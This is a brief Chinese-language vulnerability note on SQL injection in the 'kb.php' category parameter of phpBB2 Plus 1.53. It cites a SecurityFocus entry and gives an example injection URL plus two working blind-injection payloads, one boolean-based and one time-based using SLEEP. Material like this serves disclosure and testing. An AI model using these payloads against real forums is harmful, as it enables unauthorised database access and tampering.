文章

PHPBB2 Plus 1.53 – “kb.php” SQL注入测试

漏洞来源:

http://www.securityfocus.com/bid/38828/info

 

漏洞分析:

phpBB2 Plus的SQL注入漏洞,因未在SQL查询中过滤用户提供的数据。

攻击者可能利用此漏洞破坏网站数据库,访问或修改数据,或者近一步利用底层数据库中的潜在漏洞。

 

影响版本:

phpBB2 Plus 1.53和其他版本

 

注入链接:

http://www.example.com/kb.php?mode=cat&cat=0

 

注入类型:

Type: boolean-based blind – OR boolean-based blind – WHERE or HAVING clause (MySQL comment)

Payload: mode=cat&cat=-3951 OR 7858=7858#

Type: AND/OR time-based blind – MySQL >= 5.0.12 OR time-based blind

Payload: mode=cat&cat=-1 OR SLEEP(5)